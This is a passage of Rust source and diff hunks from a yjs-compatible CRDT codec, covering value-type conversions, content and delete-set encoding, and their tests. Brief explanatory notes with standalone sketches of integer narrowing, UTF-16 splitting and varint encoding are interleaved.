Self::BigInt64(int)
}
}
}
)*
};
(signed, $($ty: ty),*) => {
$(
impl From<$ty> for Any {
fn from(value: $ty) -> Self {
let int: i64 = value.into();
// handle the behavior same as yjs
if JS_INT_RANGE.contains(&int) {
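// `Integer` holds an i32, so check both bounds: a value below i32::MIN must not be truncated
if let Ok(small) = i32::try_from(int) {
Self::Integer(small)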
} else if int as f32 as i64 == int {
Self::Float32((int as f32).into())
} else {
Self::Float64((int as f64).into())
}
} else {
Self::BigInt64(int)
}
}
}
)*
};
(string, $($ty: ty),*) => {
$(
impl From<$ty> for Any {
fn from(value: $ty) -> Self {
Self::String(value.into())
}
}
)*
};
}
impl_primitive_from!(unsigned, u8, u16, u32, u64);
impl_primitive_from!(signed, i8, i16, i32, i64);
impl_primitive_from!(string, String, &str);
impl From<usize> for Any {
fn from(value: usize) -> Self {
(value as u64).into()
}
}
impl From<isize> for Any {
fn from(value: isize) -> Self {
(value as i64).into()
}
}
impl From<f32> for Any {
fn from(value: f32) -> Self {
Self::Float32(value.into())
}
}
impl From<f64> for Any {
fn from(value: f64) -> Self {
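// only take the integer path when the value fits in i64 exactly; infinities and
// huge magnitudes would otherwise saturate in the `as i64` cast
if value.trunc() == value && value >= i64::MIN as f64 && value < i64::MAX as f64 {
(value as i64).into()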
} else if value as f32 as f64 == value {
Self::Float32((value as f32).into())
} else {
Self::Float64(value.into())
}
}
}
impl From<bool> for Any {
fn from(value: bool) -> Self {
if value { Self::True } else { Self::False }
}
}
impl TryFrom<Any> for String {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::String(s) => Ok(s),
_ => Err(JwstCodecError::UnexpectedType("String")),
}
}
}
impl TryFrom<Any> for HashMap<String, Any> {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::Object(map) => Ok(map),
_ => Err(JwstCodecError::UnexpectedType("Object")),
}
}
}
impl TryFrom<Any> for Vec<Any> {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::Array(vec) => Ok(vec),
_ => Err(JwstCodecError::UnexpectedType("Array")),
}
}
}
impl TryFrom<Any> for bool {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::True => Ok(true),
Any::False => Ok(false),
_ => Err(JwstCodecError::UnexpectedType("Boolean")),
}
}
}
impl FromIterator<Any> for Any {
fn from_iter<I: IntoIterator<Item = Any>>(iter: I) -> Self {
Self::Array(iter.into_iter().collect())
}
}
impl<'a> FromIterator<&'a Any> for Any {
fn from_iter<I: IntoIterator<Item = &'a Any>>(iter: I) -> Self {
Self::Array(iter.into_iter().cloned().collect())
}
}
impl FromIterator<(String, Any)> for Any {
fn from_iter<I: IntoIterator<Item = (String, Any)>>(iter: I) -> Self {
let mut map = HashMap::new();
map.extend(iter);
Self::Object(map)
}
}
impl From<HashMap<String, Any>> for Any {
fn from(value: HashMap<String, Any>) -> Self {
Self::Object(value)
}
}
impl From<Vec<u8>> for Any {
fn from(value: Vec<u8>) -> Self {
Self::Binary(value)
}
}
impl From<&[u8]> for Any {
fn from(value: &[u8]) -> Self {
Self::Binary(value.into())
}
}
// TODO: impl for Any::Undefined
impl<T: Into<Any>> From<Option<T>> for Any {
fn from(value: Option<T>) -> Self {
if let Some(val) = value { val.into() } else { Any::Null }
}
}
#[cfg(feature = "serde_json")]
impl From<serde_json::Value> for Any {
fn from(value: serde_json::Value) -> Self {
match value {
serde_json::Value::Null => Self::Null,
serde_json::Value::Bool(b) => {
if b {
Self::True
} else {
Self::False
}
}
serde_json::Value::Number(n) => {
if n.is_f64() {
Self::Float64(n.as_f64().unwrap().into())
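} else if n.is_i64() {
// go through `From<i64>` so values outside the i32 range are not truncated
n.as_i64().unwrap().into()
} else {
// a u64 above i64::MAX; see the wrapping caveat in `impl_primitive_from!(unsigned, ..)`
n.as_u64().unwrap().into()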
}
}
serde_json::Value::String(s) => Self::String(s),
serde_json::Value::Array(vec) => Self::Array(vec.into_iter().map(|v| v.into()).collect::<Vec<_>>()),
serde_json::Value::Object(obj) => Self::Object(obj.into_iter().map(|(k, v)| (k, v.into())).collect()),
}
}
}
impl<'de> serde::Deserialize<'de> for Any {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: serde::Deserializer<'de>,
{
use serde::de::{Error, MapAccess, SeqAccess, Visitor};
struct ValueVisitor;
impl<'de> Visitor<'de> for ValueVisitor {
type Value = Any;
fn expecting(&self, formatter: &mut fmt::Formatter) -> fmt::Result {
formatter.write_str("any valid JSON value")
}
#[inline]
fn visit_bool<E>(self, value: bool) -> Result<Any, E> {
Ok(if value { Any::True } else { Any::False })
}
#[inline]
fn visit_i64<E>(self, value: i64) -> Result<Any, E> {
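// use the same narrowing as `visit_u64`, so a small negative number
// round-trips as `Integer` instead of becoming `BigInt64`
Ok(value.into())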
}
#[inline]
fn visit_u64<E>(self, value: u64) -> Result<Any, E> {
Ok((value as i64).into())
}
#[inline]
fn visit_f64<E>(self, value: f64) -> Result<Any, E> {
Ok(Any::Float64(OrderedFloat(value)))
}
#[inline]
fn visit_str<E>(self, value: &str) -> Result<Any, E>
where
E: Error,
{
self.visit_string(String::from(value))
}
#[inline]
fn visit_string<E>(self, value: String) -> Result<Any, E> {
Ok(Any::String(value))
}
#[inline]
fn visit_none<E>(self) -> Result<Any, E> {
Ok(Any::Null)
}
#[inline]
fn visit_some<D>(self, deserializer: D) -> Result<Any, D::Error>
where
D: serde::Deserializer<'de>,
{
serde::Deserialize::deserialize(deserializer)
}
#[inline]
fn visit_unit<E>(self) -> Result<Any, E> {
Ok(Any::Null)
}
#[inline]
fn visit_seq<V>(self, mut visitor: V) -> Result<Any, V::Error>
where
V: SeqAccess<'de>,
{
let mut vec = Vec::new();
while let Some(elem) = visitor.next_element()? {
vec.push(elem);
}
Ok(Any::Array(vec))
}
fn visit_map<V>(self, mut visitor: V) -> Result<Any, V::Error>
where
V: MapAccess<'de>,
{
match visitor.next_key::<String>()? {
Some(k) => {
let mut values = HashMap::new();
values.insert(k, visitor.next_value()?);
while let Some((key, value)) = visitor.next_entry()? {
values.insert(key, value);
}
Ok(Any::Object(values))
}
None => Ok(Any::Object(HashMap::new())),
}
}
}
deserializer.deserialize_any(ValueVisitor)
}
}
impl serde::Serialize for Any {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
use serde::ser::{SerializeMap, SerializeSeq};
match self {
Any::Null => serializer.serialize_none(),
Any::Undefined => serializer.serialize_none(),
Any::True => serializer.serialize_bool(true),
Any::False => serializer.serialize_bool(false),
Any::Float32(value) => serializer.serialize_f32(value.0),
Any::Float64(value) => serializer.serialize_f64(value.0),
Any::Integer(value) => serializer.serialize_i32(*value),
Any::BigInt64(value) => serializer.serialize_i64(*value),
Any::String(value) => serializer.serialize_str(value.as_ref()),
Any::Array(values) => {
let mut seq = serializer.serialize_seq(Some(values.len()))?;
for value in values.iter() {
seq.serialize_element(value)?;
}
seq.end()
}
Any::Object(entries) => {
let mut map = serializer.serialize_map(Some(entries.len()))?;
for (key, value) in entries.iter() {
map.serialize_entry(key, value)?;
}
map.end()
}
Any::Binary(buf) => serializer.serialize_bytes(buf),
}
}
}
impl Display for Any {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Self::True => write!(f, "true"),
Self::False => write!(f, "false"),
Self::String(s) => write!(f, "\"{s}\""),
Self::Integer(i) => write!(f, "{i}"),
Self::Float32(v) => write!(f, "{v}"),
Self::Float64(v) => write!(f, "{v}"),
Self::BigInt64(v) => write!(f, "{v}"),
Self::Object(map) => {
write!(f, "{{")?;
for (i, (key, value)) in map.iter().enumerate() {
if i > 0 {
write!(f, ", ")?;
}
write!(f, "{key}: {value}")?;
}
write!(f, "}}")
}
Self::Array(vec) => {
write!(f, "[")?;
for (i, value) in vec.iter().enumerate() {
if i > 0 {
write!(f, ", ")?;
}
write!(f, "{value}")?;
}
write!(f, "]")
}
Self::Binary(buf) => write!(f, "{buf:?}"),
Self::Undefined => write!(f, "undefined"),
Self::Null => write!(f, "null"),
}
}
}
#[cfg(test)]
mod tests {
use proptest::{collection::vec, prelude::*};
use super::*;
#[test]
fn test_any_codec() {
let any = Any::Object(
vec![
("name".to_string(), Any::String("Alice".to_string())),
("age".to_string(), Any::Integer(25)),
(
"contacts".to_string(),
Any::Array(vec![
Any::Object(
vec![
("type".to_string(), Any::String("Mobile".to_string())),
("number".to_string(), Any::String("1234567890".to_string())),
]
.into_iter()
.collect(),
),
Any::Object(
vec![
("type".to_string(), Any::String("Email".to_string())),
("address".to_string(), Any::String("alice@example.com".to_string())),
]
.into_iter()
.collect(),
),
Any::Undefined,
]),
),
(
"standard_data".to_string(),
Any::Array(vec![
Any::Undefined,
Any::Null,
Any::Integer(114514),
Any::Float32(114.514.into()),
Any::Float64(115.514.into()),
Any::BigInt64(-1145141919810),
Any::False,
Any::True,
Any::Object(
vec![
("name".to_string(), Any::String("tadokoro".to_string())),
("age".to_string(), Any::String("24".to_string())),
("profession".to_string(), Any::String("student".to_string())),
]
.into_iter()
.collect(),
),
Any::Binary(vec![1, 2, 3, 4, 5]),
]),
),
]
.into_iter()
.collect(),
);
let mut encoder = RawEncoder::default();
any.write(&mut encoder).unwrap();
let encoded = encoder.into_inner();
let mut decoder = RawDecoder::new(&encoded);
let decoded = Any::read(&mut decoder).unwrap();
assert_eq!(any, decoded);
}
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_any(any in vec(any::<Any>(), 0..100)) {
for any in &any {
let mut encoder = RawEncoder::default();
any.write(&mut encoder).unwrap();
let encoded = encoder.into_inner();
let mut decoder = RawDecoder::new(&encoded);
let decoded = Any::read(&mut decoder).unwrap();
assert_eq!(any, &decoded);
}
}
}
#[test]
fn test_convert_to_any() {
let any: Vec<Any> = vec![
42u8.into(),
42u16.into(),
42u32.into(),
42u64.into(),
114.514f32.into(),
1919.810f64.into(),
(-42i8).into(),
(-42i16).into(),
(-42i32).into(),
(-42i64).into(),
false.into(),
true.into(),
"JWST".to_string().into(),
"OctoBase".into(),
vec![1u8, 9, 1, 9].into(),
(&[8u8, 1, 0][..]).into(),
[Any::True, 42u8.into()].iter().collect(),
];
assert_eq!(
any,
vec![
Any::Integer(42),
Any::Integer(42),
Any::Integer(42),
Any::Integer(42),
Any::Float32(114.514.into()),
Any::Float64(1919.810.into()),
Any::Integer(-42),
Any::Integer(-42),
Any::Integer(-42),
Any::Integer(-42),
Any::False,
Any::True,
Any::String("JWST".to_string()),
Any::String("OctoBase".to_string()),
Any::Binary(vec![1, 9, 1, 9]),
Any::Binary(vec![8, 1, 0]),
Any::Array(vec![Any::True, Any::Integer(42)])
]
);
assert_eq!(
vec![("key".to_string(), 10u64.into())].into_iter().collect::<Any>(),
Any::Object(HashMap::from_iter(vec![("key".to_string(), Any::Integer(10))]))
);
let any: Any = 10u64.into();
assert_eq!([any].iter().collect::<Any>(), Any::Array(vec![Any::Integer(10)]));
}
}
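The integer conversions in `impl_primitive_from!` pick the narrowest variant that holds a value exactly. A minimal standalone sketch of that selection follows. `Num`, `JS_SAFE`, and `classify` are illustrative names that do not exist in the crate, and `JS_SAFE` assumes that `JS_INT_RANGE` (defined outside this hunk) is the JavaScript safe-integer range. The sketch checks both i32 bounds through `i32::try_from`.

```rust
use std::ops::RangeInclusive;

// Hypothetical stand-in for the numeric variants of `Any`.
#[derive(Debug, PartialEq)]
enum Num {
    Integer(i32),
    Float32(f32),
    Float64(f64),
    BigInt64(i64),
}

// Assumption: mirrors JS Number.MIN_SAFE_INTEGER..=Number.MAX_SAFE_INTEGER.
const JS_SAFE: RangeInclusive<i64> = -9_007_199_254_740_991..=9_007_199_254_740_991;

fn classify(int: i64) -> Num {
    if !JS_SAFE.contains(&int) {
        // Outside the safe range only a 64-bit integer keeps the exact value.
        return Num::BigInt64(int);
    }
    if let Ok(small) = i32::try_from(int) {
        Num::Integer(small)
    } else if int as f32 as i64 == int {
        // The value survives a round trip through f32, so f32 is exact here.
        Num::Float32(int as f32)
    } else {
        Num::Float64(int as f64)
    }
}
```

For example, `classify(2_147_483_648)` takes the `Float32` path because 2^31 is exactly representable in an f32, while `classify(2_147_483_649)` needs `Float64`.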
@@ -1,384 +0,0 @@
use super::*;
#[derive(Clone)]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub(crate) enum Content {
Deleted(u64),
Json(Vec<Option<String>>),
Binary(Vec<u8>),
String(String),
#[cfg_attr(test, proptest(skip))]
Embed(Any),
#[cfg_attr(test, proptest(skip))]
Format {
key: String,
value: Any,
},
#[cfg_attr(test, proptest(skip))]
Type(YTypeRef),
Any(Vec<Any>),
Doc {
guid: String,
opts: Any,
},
}
unsafe impl Send for Content {}
unsafe impl Sync for Content {}
impl From<Any> for Content {
fn from(value: Any) -> Self {
match value {
Any::Undefined
| Any::Null
| Any::Integer(_)
| Any::Float32(_)
| Any::Float64(_)
| Any::BigInt64(_)
| Any::False
| Any::True
| Any::String(_)
| Any::Object(_) => Content::Any(vec![value; 1]),
Any::Array(v) => Content::Any(v),
Any::Binary(b) => Content::Binary(b),
}
}
}
impl PartialEq for Content {
fn eq(&self, other: &Self) -> bool {
match (self, other) {
(Self::Deleted(len1), Self::Deleted(len2)) => len1 == len2,
(Self::Json(vec1), Self::Json(vec2)) => vec1 == vec2,
(Self::Binary(vec1), Self::Binary(vec2)) => vec1 == vec2,
(Self::String(str1), Self::String(str2)) => str1 == str2,
(Self::Embed(json1), Self::Embed(json2)) => json1 == json2,
(
Self::Format {
key: key1,
value: value1,
},
Self::Format {
key: key2,
value: value2,
},
) => key1 == key2 && value1 == value2,
(Self::Any(any1), Self::Any(any2)) => any1 == any2,
(Self::Doc { guid: guid1, .. }, Self::Doc { guid: guid2, .. }) => guid1 == guid2,
(Self::Type(ty1), Self::Type(ty2)) => ty1 == ty2,
_ => false,
}
}
}
impl std::fmt::Debug for Content {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Deleted(arg0) => f.debug_tuple("Deleted").field(arg0).finish(),
Self::Json(arg0) => f
.debug_tuple("JSON")
.field(&format!("Vec [len: {}]", arg0.len()))
.finish(),
Self::Binary(arg0) => f
.debug_tuple("Binary")
.field(&format!("Binary [len: {}]", arg0.len()))
.finish(),
Self::String(arg0) => f.debug_tuple("String").field(arg0).finish(),
Self::Embed(arg0) => f.debug_tuple("Embed").field(arg0).finish(),
Self::Format { key, value } => f
.debug_struct("Format")
.field("key", key)
.field("value", value)
.finish(),
// a `Debug` impl should not panic, so print `None` when the type is no longer available
Self::Type(arg0) => f.debug_tuple("Type").field(&arg0.ty().map(|ty| ty.kind())).finish(),
Self::Any(arg0) => f.debug_tuple("Any").field(arg0).finish(),
Self::Doc { guid, opts } => f.debug_struct("Doc").field("guid", guid).field("opts", opts).finish(),
}
}
}
impl Content {
pub(crate) fn read<R: CrdtReader>(decoder: &mut R, tag_type: u8) -> JwstCodecResult<Self> {
match tag_type {
1 => Ok(Self::Deleted(decoder.read_var_u64()?)), // Deleted
2 => {
let len = decoder.read_var_u64()?;
let strings = (0..len)
.map(|_| decoder.read_var_string().map(|s| (s != "undefined").then_some(s)))
.collect::<Result<Vec<_>, _>>()?;
Ok(Self::Json(strings))
} // JSON
3 => Ok(Self::Binary(decoder.read_var_buffer()?.to_vec())), // Binary
4 => Ok(Self::String(decoder.read_var_string()?)), // String
5 => {
let string = decoder.read_var_string()?;
let json = serde_json::from_str(&string).map_err(|_| JwstCodecError::DamagedDocumentJson)?;
Ok(Self::Embed(json))
} // Embed
6 => {
let key = decoder.read_var_string()?;
let value = decoder.read_var_string()?;
let value = serde_json::from_str(&value).map_err(|_| JwstCodecError::DamagedDocumentJson)?;
Ok(Self::Format { key, value })
} // Format
7 => {
let type_ref = decoder.read_var_u64()?;
let kind = YTypeKind::from(type_ref);
let tag_name = match kind {
YTypeKind::XMLElement | YTypeKind::XMLHook => Some(decoder.read_var_string()?),
YTypeKind::Unknown => {
return Err(JwstCodecError::IncompleteDocument(format!(
"Unknown y type: {type_ref}"
)));
}
_ => None,
};
Ok(Self::Type(YTypeRef::new(kind, tag_name)))
} // YType
8 => Ok(Self::Any(Any::read_multiple(decoder)?)), // Any
9 => {
let guid = decoder.read_var_string()?;
let opts = Any::read(decoder)?;
Ok(Self::Doc { guid, opts })
} // Doc
tag_type => Err(JwstCodecError::IncompleteDocument(format!(
"Unknown content type: {tag_type}"
))),
}
}
pub(crate) fn get_info(&self) -> u8 {
match self {
Self::Deleted(_) => 1,
Self::Json(_) => 2,
Self::Binary(_) => 3,
Self::String(_) => 4,
Self::Embed(_) => 5,
Self::Format { .. } => 6,
Self::Type(_) => 7,
Self::Any(_) => 8,
Self::Doc { .. } => 9,
}
}
pub(crate) fn write<W: CrdtWriter>(&self, encoder: &mut W) -> JwstCodecResult {
match self {
Self::Deleted(len) => {
encoder.write_var_u64(*len)?;
}
Self::Json(strings) => {
encoder.write_var_u64(strings.len() as u64)?;
for string in strings {
match string {
Some(string) => encoder.write_var_string(string)?,
None => encoder.write_var_string("undefined")?,
}
}
}
Self::Binary(buffer) => {
encoder.write_var_buffer(buffer)?;
}
Self::String(string) => {
encoder.write_var_string(string)?;
}
Self::Embed(val) => {
encoder.write_var_string(serde_json::to_string(val).map_err(|_| JwstCodecError::DamagedDocumentJson)?)?;
}
Self::Format { key, value } => {
encoder.write_var_string(key)?;
encoder.write_var_string(serde_json::to_string(value).map_err(|_| JwstCodecError::DamagedDocumentJson)?)?;
}
Self::Type(ty) => {
if let Some(ty) = ty.ty() {
let type_ref = u64::from(ty.kind());
encoder.write_var_u64(type_ref)?;
if matches!(ty.kind(), YTypeKind::XMLElement | YTypeKind::XMLHook) {
encoder.write_var_string(ty.name.as_ref().unwrap())?;
}
}
}
Self::Any(any) => {
Any::write_multiple(encoder, any)?;
}
Self::Doc { guid, opts } => {
encoder.write_var_string(guid)?;
opts.write(encoder)?;
}
}
Ok(())
}
pub fn clock_len(&self) -> u64 {
match self {
Self::Deleted(len) => *len,
Self::Json(strings) => strings.len() as u64,
// TODO: need a custom wrapper with the length cached; recomputing it on every call costs too much
Self::String(string) => string.chars().map(|c| c.len_utf16()).sum::<usize>() as u64,
Self::Any(any) => any.len() as u64,
Self::Binary(_) | Self::Embed(_) | Self::Format { .. } | Self::Type(_) | Self::Doc { .. } => 1,
}
}
pub fn countable(&self) -> bool {
!matches!(self, Content::Format { .. } | Content::Deleted(_))
}
#[allow(dead_code)]
pub fn splittable(&self) -> bool {
// keep in sync with the variants handled by `split`
matches!(self, Self::String(_) | Self::Any(_) | Self::Json(_) | Self::Deleted(_))
}
pub fn split(&self, diff: u64) -> JwstCodecResult<(Self, Self)> {
match self {
Self::String(str) => {
let (left, right) = Self::split_as_utf16_str(str.as_str(), diff);
Ok((Self::String(left.to_string()), Self::String(right.to_string())))
}
// offsets past the end fall through to the error arm instead of panicking
Self::Json(vec) if diff <= vec.len() as u64 => {
let (left, right) = vec.split_at(diff as usize);
Ok((Self::Json(left.to_owned()), Self::Json(right.to_owned())))
}
Self::Any(vec) if diff <= vec.len() as u64 => {
let (left, right) = vec.split_at(diff as usize);
Ok((Self::Any(left.to_owned()), Self::Any(right.to_owned())))
}
Self::Deleted(len) if diff <= *len => {
let (left, right) = (diff, *len - diff);
Ok((Self::Deleted(left), Self::Deleted(right)))
}
_ => Err(JwstCodecError::ContentSplitNotSupport(diff)),
}
}
/// consider `offset` as a utf-16 encoded string offset
fn split_as_utf16_str(s: &str, offset: u64) -> (&str, &str) {
let mut utf_16_offset = 0;
let mut utf_8_offset = 0;
for ch in s.chars() {
// stop before consuming the next char, so that an offset of 0 yields an empty left half
if utf_16_offset as u64 >= offset {
break;
}
utf_16_offset += ch.len_utf16();
utf_8_offset += ch.len_utf8();
}
s.split_at(utf_8_offset)
}
}
#[cfg(test)]
mod tests {
use proptest::{collection::vec, prelude::*};
use super::*;
fn content_round_trip(content: &Content) -> JwstCodecResult {
let mut writer = RawEncoder::default();
writer.write_u8(content.get_info())?;
content.write(&mut writer)?;
let update = writer.into_inner();
let mut reader = RawDecoder::new(&update);
let tag_type = reader.read_u8()?;
let decoded = Content::read(&mut reader, tag_type)?;
match (&decoded, content) {
(Content::Type(decoded_ty), Content::Type(original_ty)) => {
let decoded_ty = decoded_ty.ty().expect("decoded ytype must exist");
let original_ty = original_ty.ty().expect("original ytype must exist");
assert_eq!(decoded_ty.kind(), original_ty.kind());
assert_eq!(decoded_ty.name.as_deref(), original_ty.name.as_deref());
}
_ => assert_eq!(decoded, *content),
}
Ok(())
}
#[test]
fn test_content() {
loom_model!({
let contents = [
Content::Deleted(42),
Content::Json(vec![None, Some("test_1".to_string()), Some("test_2".to_string())]),
Content::Binary(vec![1, 2, 3]),
Content::String("hello".to_string()),
Content::Embed(Any::True),
Content::Format {
key: "key".to_string(),
value: Any::Integer(42),
},
Content::Type(YTypeRef::new(YTypeKind::Array, None)),
Content::Type(YTypeRef::new(YTypeKind::Map, None)),
Content::Type(YTypeRef::new(YTypeKind::Text, None)),
Content::Type(YTypeRef::new(YTypeKind::XMLElement, Some("test".to_string()))),
Content::Type(YTypeRef::new(YTypeKind::XMLFragment, None)),
Content::Type(YTypeRef::new(YTypeKind::XMLHook, Some("test".to_string()))),
Content::Type(YTypeRef::new(YTypeKind::XMLText, None)),
Content::Any(vec![Any::BigInt64(42), Any::String("Test Any".to_string())]),
Content::Doc {
guid: "my_guid".to_string(),
opts: Any::BigInt64(42),
},
];
for content in &contents {
content_round_trip(content).unwrap();
}
});
}
#[test]
fn test_content_split() {
let contents = [
Content::String("hello".to_string()),
Content::Json(vec![None, Some("test_1".to_string()), Some("test_2".to_string())]),
Content::Any(vec![Any::BigInt64(42), Any::String("Test Any".to_string())]),
Content::Binary(vec![]),
];
{
let (left, right) = contents[0].split(1).unwrap();
assert!(contents[0].splittable());
assert_eq!(left, Content::String("h".to_string()));
assert_eq!(right, Content::String("ello".to_string()));
}
{
let (left, right) = contents[1].split(1).unwrap();
assert!(contents[1].splittable());
assert_eq!(left, Content::Json(vec![None]));
assert_eq!(
right,
Content::Json(vec![Some("test_1".to_string()), Some("test_2".to_string())])
);
}
{
let (left, right) = contents[2].split(1).unwrap();
assert!(contents[2].splittable());
assert_eq!(left, Content::Any(vec![Any::BigInt64(42)]));
assert_eq!(right, Content::Any(vec![Any::String("Test Any".to_string())]));
}
{
assert!(!contents[3].splittable());
assert_eq!(contents[3].split(2), Err(JwstCodecError::ContentSplitNotSupport(2)));
}
}
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_content(contents in vec(any::<Content>(), 0..10)) {
for content in &contents {
content_round_trip(content).unwrap();
}
}
}
}
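`Content::split` treats its offset as a count of UTF-16 code units, while a Rust `&str` is sliced by UTF-8 byte index. A standalone sketch of that translation is shown here. `split_at_utf16` is a hypothetical free function and not the crate's private helper, and rounding up to the end of a surrogate pair is a choice made for this sketch.

```rust
/// Splits `s` at a UTF-16 code-unit offset.
/// If the offset falls inside a surrogate pair, the whole character stays in the left half.
fn split_at_utf16(s: &str, offset: usize) -> (&str, &str) {
    let mut utf16_units = 0;
    let mut utf8_bytes = 0;
    for ch in s.chars() {
        // Stop before consuming a character once enough UTF-16 units are covered.
        if utf16_units >= offset {
            break;
        }
        utf16_units += ch.len_utf16();
        utf8_bytes += ch.len_utf8();
    }
    // `utf8_bytes` always lands on a char boundary, so `split_at` cannot panic.
    s.split_at(utf8_bytes)
}
```

An offset of 0 returns an empty left half, and an offset beyond the end returns the whole string on the left.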
@@ -1,227 +0,0 @@
use std::{
collections::{VecDeque, hash_map::Entry},
ops::{Deref, DerefMut, Range},
};
use super::*;
use crate::doc::OrderRange;
impl<R: CrdtReader> CrdtRead<R> for Range<u64> {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let clock = decoder.read_var_u64()?;
let len = decoder.read_var_u64()?;
Ok(clock..clock + len)
}
}
impl<W: CrdtWriter> CrdtWrite<W> for Range<u64> {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.start)?;
encoder.write_var_u64(self.end - self.start)?;
Ok(())
}
}
impl<R: CrdtReader> CrdtRead<R> for OrderRange {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let num_of_deletes = decoder.read_var_u64()? as usize;
if num_of_deletes == 1 {
Ok(OrderRange::Range(Range::<u64>::read(decoder)?))
} else {
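// See: [HASHMAP_SAFE_CAPACITY]; do not pre-allocate from an untrusted length
let mut deletes = VecDeque::with_capacity(num_of_deletes.min(HASHMAP_SAFE_CAPACITY));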
for _ in 0..num_of_deletes {
deletes.push_back(Range::<u64>::read(decoder)?);
}
Ok(OrderRange::Fragment(deletes))
}
}
}
impl<W: CrdtWriter> CrdtWrite<W> for OrderRange {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
match self {
OrderRange::Range(range) => {
encoder.write_var_u64(1)?;
range.write(encoder)?;
}
OrderRange::Fragment(ranges) => {
encoder.write_var_u64(ranges.len() as u64)?;
for range in ranges {
range.write(encoder)?;
}
}
}
Ok(())
}
}
#[derive(Debug, Default, Clone, PartialEq)]
pub struct DeleteSet(pub ClientMap<OrderRange>);
impl Deref for DeleteSet {
type Target = ClientMap<OrderRange>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl<const N: usize> From<[(Client, Vec<Range<u64>>); N]> for DeleteSet {
fn from(value: [(Client, Vec<Range<u64>>); N]) -> Self {
let mut map = ClientMap::with_capacity(N);
for (client, ranges) in value {
map.insert(client, ranges.into());
}
Self(map)
}
}
impl DerefMut for DeleteSet {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl DeleteSet {
pub fn add(&mut self, client: Client, from: Clock, len: Clock) {
self.add_range(client, from..from + len);
}
pub fn add_range(&mut self, client: Client, range: Range<u64>) {
match self.0.entry(client) {
Entry::Occupied(e) => {
let r = e.into_mut();
if r.is_empty() {
*r = range.into();
} else {
r.push(range);
}
}
Entry::Vacant(e) => {
e.insert(range.into());
}
}
}
pub fn batch_add_ranges(&mut self, client: Client, ranges: Vec<Range<u64>>) {
match self.0.entry(client) {
Entry::Occupied(e) => {
e.into_mut().extend(ranges);
}
Entry::Vacant(e) => {
e.insert(ranges.into());
}
}
}
pub fn merge(&mut self, other: &Self) {
for (client, range) in &other.0 {
match self.0.entry(*client) {
Entry::Occupied(e) => {
e.into_mut().merge(range.clone());
}
Entry::Vacant(e) => {
e.insert(range.clone());
}
}
}
}
}
impl<R: CrdtReader> CrdtRead<R> for DeleteSet {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let num_of_clients = decoder.read_var_u64()? as usize;
// See: [HASHMAP_SAFE_CAPACITY]
let mut map = ClientMap::with_capacity(num_of_clients.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..num_of_clients {
let client = decoder.read_var_u64()?;
let deletes = OrderRange::read(decoder)?;
map.insert(client, deletes);
}
map.shrink_to_fit();
Ok(DeleteSet(map))
}
}
impl<W: CrdtWriter> CrdtWrite<W> for DeleteSet {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.len() as u64)?;
let mut clients = self.keys().copied().collect::<Vec<_>>();
// Descending
clients.sort_by(|a, b| b.cmp(a));
for client in clients {
encoder.write_var_u64(client)?;
self.get(&client).unwrap().write(encoder)?;
}
Ok(())
}
}
#[cfg(test)]
#[allow(clippy::single_range_in_vec_init)]
mod tests {
use super::*;
#[test]
fn test_delete_set_add() {
let delete_set = DeleteSet::from([
(1, vec![0..10, 20..30]),
(2, vec![0..5, 10..20]),
(3, vec![15..20, 30..35]),
(4, vec![0..10]),
]);
{
let mut delete_set = delete_set.clone();
delete_set.add(1, 5, 25);
assert_eq!(delete_set.get(&1), Some(&OrderRange::Range(0..30)));
}
{
let mut delete_set = delete_set;
delete_set.add(1, 5, 10);
assert_eq!(delete_set.get(&1), Some(&OrderRange::from(vec![0..15, 20..30])));
}
}
#[test]
fn test_delete_set_batch_push() {
let delete_set = DeleteSet::from([
(1, vec![0..10, 20..30]),
(2, vec![0..5, 10..20]),
(3, vec![15..20, 30..35]),
(4, vec![0..10]),
]);
{
let mut delete_set = delete_set.clone();
delete_set.batch_add_ranges(1, vec![0..5, 10..20]);
assert_eq!(delete_set.get(&1), Some(&OrderRange::Range(0..30)));
}
{
let mut delete_set = delete_set;
delete_set.batch_add_ranges(1, vec![40..50, 10..20]);
assert_eq!(delete_set.get(&1), Some(&OrderRange::from(vec![0..30, 40..50])));
}
}
#[test]
fn test_encode_decode() {
let delete_set = DeleteSet::from([(1, vec![0..10, 20..30]), (2, vec![0..5, 10..20])]);
let mut encoder = RawEncoder::default();
delete_set.write(&mut encoder).unwrap();
let update = encoder.into_inner();
let mut decoder = RawDecoder::new(&update);
let decoded = DeleteSet::read(&mut decoder).unwrap();
assert_eq!(delete_set, decoded);
}
}
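Each delete range is written as two variable-length integers: the start clock, then the length (`end - start`). The sketch below reproduces that layout with standalone helpers. It assumes the var-int is plain unsigned LEB128, which agrees with the `754 -> [0xf2, 0x5]` vector in the `RawDecoder` tests. The function names are illustrative and the crate's own `write_var_u64` / `read_var_u64` have different signatures.

```rust
use std::ops::Range;

// Assumed encoding: 7 payload bits per byte, high bit set while more bytes follow.
fn write_var_u64(out: &mut Vec<u8>, mut n: u64) {
    while n >= 0x80 {
        out.push((n as u8 & 0x7f) | 0x80);
        n >>= 7;
    }
    out.push(n as u8);
}

fn read_var_u64(input: &[u8], pos: &mut usize) -> Option<u64> {
    let mut value = 0u64;
    let mut shift = 0u32;
    loop {
        let byte = *input.get(*pos)?;
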